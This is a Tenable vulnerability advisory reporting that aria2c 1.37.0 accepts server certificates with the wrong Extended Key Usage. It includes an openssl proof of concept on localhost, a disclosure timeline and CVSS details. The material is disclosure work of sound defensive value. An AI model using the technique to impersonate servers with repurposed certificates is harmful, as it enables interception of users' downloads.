aria2c Improper Certificate Validation

Synopsis

Tenable Research discovered that aria2c accepts a server certificate with incorrect Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

Proof of Concept

In this PoC, we will demonstrate generating private keys and the corresponding X.509 certificates, configuring a TLS server to use them, and then how aria2c fails to properly validate a certificate not meant to be used for TLS server authentication. In a real attack, the attackers would reuse the X.509 certificate and its corresponding key they managed to compromise.

Generate a set of RSA keys:

openssl genrsa -out ca-key.pem 2048

openssl genrsa -out server-key.pem 2048

Create an OpenSSL config:

cat openssl-ca.cfg

[ ca ]

keyUsage = critical,digitalSignature,keyCertSign,cRLSign

extendedKeyUsage = serverAuth,clientAuth

basicConstraints = critical,CA:TRUE

subjectKeyIdentifier = hash

authorityKeyIdentifier = keyid:always

[ server ]

keyUsage = critical,digitalSignature

extendedKeyUsage = serverAuth

basicConstraints = critical,CA:FALSE

subjectKeyIdentifier = hash

authorityKeyIdentifier = keyid:always

[ server-bad-eku ]

keyUsage = critical,digitalSignature

extendedKeyUsage = clientAuth

basicConstraints = critical,CA:FALSE

subjectKeyIdentifier = hash

authorityKeyIdentifier = keyid:always

Generate root CA certificate:

openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj "/CN=TestCA" -config openssl-ca.cfg -extensions ca

Generate a certificate signing request:

openssl req -new -key server-key.pem -out server.csr -subj "/CN=server" -addext "subjectAltName = DNS:localhost"

Generate a valid server certificate:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall

Check EKU the generated certificate:

openssl x509 -text -noout -in server-cert.pem | grep -i 'Extended Key Usage' -A1

X509v3 Extended Key Usage:

TLS Web Server Authentication

Generate invalid server certificates with incorrect EKU:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall

Check EKU in the generated certificate:

openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i 'Extended Key Usage' -A1

X509v3 Extended Key Usage:

TLS Web Client Authentication

Start a server using a valid server certificate:

openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080

Connection succeeds as expected:

aria2c --ca-certificate=ca-cert.pem https://localhost:8080

04/30 18:14:37 [NOTICE] Downloading 1 item(s)

04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html

Download Results:

gid |stat|avg speed |path/URI

======+====+===========+=======================================================

9bf002|OK | 588KiB/s|/home/parallels/aria2c/index.html

Status Legend:

(OK):download completed.

Start a server using a server certificate with incorrect EKU:

openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080

Connection succeeds while it shouldn’t:

aria2c --ca-certificate=ca-cert.pem https://localhost:8080

04/30 18:14:57 [NOTICE] Downloading 1 item(s)

04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.

04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html

Download Results:

gid |stat|avg speed |path/URI

======+====+===========+=======================================================

c6e101|OK | 673KiB/s|/home/parallels/aria2c/index.1.html

Status Legend:

(OK):download completed.

aria2c --ca-certificate=ca-cert.pem --check-certificate https://localhost:8080

04/30 18:15:07 [NOTICE] Downloading 1 item(s)

04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.

04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html

Download Results:

gid |stat|avg speed |path/URI

======+====+===========+=======================================================

686fe6|OK | 786KiB/s|/home/parallels/aria2c/index.2.html

Status Legend:

(OK):download completed.

aria2c --ca-certificate=ca-cert.pem --check-certificate=true https://localhost:8080

04/30 18:15:14 [NOTICE] Downloading 1 item(s)

04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.

04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html

Download Results:

gid |stat|avg speed |path/URI

======+====+===========+=======================================================

4a4aec|OK | 786KiB/s|/home/parallels/aria2c/index.3.html

Status Legend:

(OK):download completed.

Version of aria2c which was tested on Ubuntu 24.04:

aria2c --version | head -n 1

aria2 version 1.37.0

Other versions may be vulnerable too, but we have not validated additional versions.

Solution

There is currently no fix available.

Additional References

https://github.com/aria2/aria2

Disclosure Timeline

November 12, 2025: Tenable sends contact request to aria2c maintainers from AUTHORS file

January 6, 2026: Tenable sends second contact request.

March 23, 2026: Tenable attempts to find other contact info. Tenable sends third contact request via email and Linkedin.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2026-8367

Tenable Advisory ID: TRA-2026-38

Credit:
Ireneusz Pastusiak

CVSSv3 Base / Temporal Score:
4.8

CVSSv3 Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Affected Products:
aria2c <= 1.37.0

Risk Factor:
Medium

Explore By Use Case

Explore By Industry

Tenable is the one clear leader in Exposure Management

Exposure management resource center

Accelerate your exposure management strategy with practical resources and tools.

aria2c Improper Certificate Validation

Synopsis

Solution

Additional References

Disclosure Timeline

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

Request a demo

Thank You

See Tenable in action

Thank you for subscribing!

Learn How Tenable Helps Achieve SLCGP Cybersecurity Plan Requirements

Thank You

Cybersecurity news you can use

Thank you for subscribing!

Try for free

Tenable Vulnerability Management

Buy now

Tenable Vulnerability Management

100

Thank You

Try for free

Try Tenable Web App Scanning

Buy now

Buy Tenable Web App Scanning

5

$3,578

Thank You

Try for free

Try Tenable Nessus Professional free

Buy now

Buy Tenable Nessus Professional

Try for free

Try Tenable Nessus Expert free

Buy now

Buy Nessus Expert

Advanced Support Plan Features

Phone Support

Chat Support

Tenable Community Support Portal

Initial Response Time

Support Contacts

Exposure management
resource center